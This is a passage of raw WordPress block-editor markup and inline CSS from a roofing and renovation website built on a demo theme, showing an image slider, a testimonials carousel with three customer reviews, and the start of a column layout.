data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7b7c381d-2ee6-49d3-980d-86ae77f3a19b\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"a71d05cc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-a71d05cc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-a71d05cc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a3113ac5-0315-4980-91d6-5f8fca2f2ce6\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"724647d4-72e4-4f11-823a-ed346d86135e\"} -->\n<style type=\"text/css\"> .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-724647d4-72e4-4f11-823a-ed346d86135e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"98ff327e-941a-4894-bff7-2d76ffc2b5d9\"} -->\n<style type=\"text/css\"> .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n 